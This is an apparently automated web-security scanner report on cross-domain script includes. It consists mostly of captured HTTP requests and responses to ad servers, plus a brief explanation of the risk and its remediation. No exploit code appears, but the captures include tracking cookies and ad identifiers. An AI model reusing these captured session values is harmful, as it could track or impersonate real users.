<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... <!-- Code auto-generated on Thu Apr 21 18:16:06 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... HPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"><img src="http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 12:24:39 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 24 Apr 2011 12:09:39 GMT Expires: Sun, 24 Apr 2011 12:09:39 GMT Cache-Control: private Content-Length: 343
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-web-hosting.htm"><img src="http://s0.2mdn.net/viewad/1577894/hostvoice_300x250_030707.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
<html> <head><title>Document moved</title></head> <body><h1>Document moved</h1> This document has moved <a href="https://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=26458;sz=1x1">here</a> ...[SNIP]...
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://cmi.netseer.com/match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1">here</A> ...[SNIP]...
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:36:35 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1814
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634688&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616850765&bpp=3&shv=r20110414&jsv=r20110415&correlator=1303616850771&frm=0&adk=1607234649&ga_vid=46826865.1303616851&ga_sid=1303616851&ga_hid=20450205&ga_fc=0&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=34&xpc=bnMIytOUQ3&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:47:29 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 6814
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634521&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616551239&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303616551462&frm=0&adk=1607234649&ga_vid=1752949238.1303616552&ga_sid=1303616552&ga_hid=1192729809&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=783&xpc=7zsW6P0jZh&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:51:47 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 13593
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DCampusCorner.com/Security%26adT%3DSecurity%2BGuard%2BSchools%26adU%3Dwww.tftus.com%26adT%3DQA%2B%2526amp%253B%2BTesting%2BServices%26gl%3DUS&usg=AFQjCNHLZNMmMjU-c1A29DkBR9Q0wRPxaw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634845&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616845243&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616845251&frm=0&adk=1607234649&ga_vid=2065049722.1303616845&ga_sid=1303616845&ga_hid=943068844&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=27&xpc=wncD24Liaw&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:47:23 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 6769
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303648039933&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303648039951&frm=1&adk=2614322350&ga_vid=487742829.1303648040&ga_sid=1303648040&ga_hid=1301447053&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=20 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:27:16 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 3061
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634545&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616544945&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616545155&frm=0&adk=1607234649&ga_vid=445929804.1303616545&ga_sid=1303616545&ga_hid=1955879462&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=356&xpc=ph8hZ4Ud12&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 04:06:27 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 3738
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:26:12 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1838
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303636784&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Flocal-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm&dt=1303618810258&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303618811039&frm=0&adk=1819763764&ga_vid=1956937505.1303618812&ga_sid=1303618812&ga_hid=1530788247&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&eid=36815002%2C33895132&fu=0&ifi=1&dtd=1996&xpc=zFcEE1wUwg&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 04:20:12 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12293
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/local-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPECSforAll.com%26adT%3DFree%2BPECS%2B18000%252B%26adU%3Dwww.niu.edu/offcampusacademics%26adT%3DOnline%2BHealth%2BDegrees%26adU%3Dwww.cpfamilynetwork.org%26adT%3DCerebral%2BPalsy%2BResources%26gl%3DUS&usg=AFQjCNF9FK94IaCIW16Ik0qkm3Kokpn7ow" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 12:29:00 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 3062
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303636808&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Flocal-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm&dt=1303618808517&bpp=3&shv=r20110414&jsv=r20110415&correlator=1303618808645&frm=0&adk=1819763764&ga_vid=1507686102.1303618809&ga_sid=1303618809&ga_hid=1283241159&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=484&xpc=lY0g1JXEXh&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 04:20:07 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 3608
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634521&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616551239&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303616551462&frm=0&adk=1607234649&ga_vid=1752949238.1303616552&ga_sid=1303616552&ga_hid=1192729809&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=783&xpc=7zsW6P0jZh&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:42:30 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12552
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Elmhurst.edu/ELSA%26adT%3DLearning%2BFor%2BA%2BLifetime%26adU%3Dwww.WGU.edu%26adT%3DTeach%2BAutistic%2BChildren%26adU%3Dwww.cpfamilynetwork.org%26adT%3DCerebral%2BPalsy%2BResources%26gl%3DUS&usg=AFQjCNEVKLLpbKLKWkte_Ib-f5xc23i4vg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Equifax Per ...[SNIP]... <!-- Added as a part of ITG 150269 Start -->
<img height="1" width="1" src="https://switch.atdmt.com/action/bvkefx_NewCustomerRegistrationPage_4"/> <!-- Added as a part of ITG 150269 End --> ...[SNIP]... <noscript> <iframe src="https://fls.doubleclick.net/activityi;src=2716759;type=core-371;cat=order991;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 